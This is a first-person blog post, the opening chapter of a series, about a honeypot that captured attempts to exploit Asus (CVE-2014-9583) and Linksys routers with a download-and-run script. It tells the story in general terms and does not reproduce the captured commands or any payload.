Chapter One: The Packet

This all started because I was bored and looking for something to do. Really.

One weekend in June I set up a honeypot, simply a Ubuntu Linux system running Apache and running full packet capture with tcpdump. I was expecting to capture Shellshock exploitation against the web server. So one of the first things I did was to look for the string wget, that would indicate a hacker was attempting to break into a computer–my decoy honeypot, and was instructing it to download a larger, more complex program. I found wget all right, but not in the place I expected.

Packet to UDP port 9999

This network packet started everything. A packet to UDP port 9999 with an embedded shell script, instructing the computer to use wget to download a file, and run it. It is not appropriate for one computer on the Internet to tell another computer what to do, sending a command out of nowhere. There is no authentication. So right away, I knew I had something “bad”. But what?

It was clear, from the presence of the chmod, rm and other clues the target of the command was a Unix system. I soon discovered that some Asus routers, like the routers used in homes and small offices, listened on UDP port 9999. These routers often run a version of the Linux operating system. And, there was a vulnerability and an exploit, documented by Friedrich Postelstorfer and Joshua “jduck” Drake. The vulnerability had industry number CVE-2014-9583 and could let an unauthorized person take over an unpatched Asus router.

But there’s more. Minutes before the attempt to exploit an Asus vulnerability, the same IP address attempted to exploit a vulnerability in Cisco/Linksys routers.

Packet to TCP port 80

So, one IP address attempts to break into another system on the Internet, first using a backdoor into Linksys hardware, then a few minutes later using a backdoor into Asus hardware. Some searching did not find public discussion of this tactic.

At this point I was thrilled and was eager to chase this threat. The instruction in the Asus exploit directed the would-be victim to download another program and run it. I tried to download the program in the same way, but the downloads were never successful. As I continued to capture exploitation attempts from multiple IP addresses around the world, I knew I would have to get smarter.

To be continued in chapter 2…

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s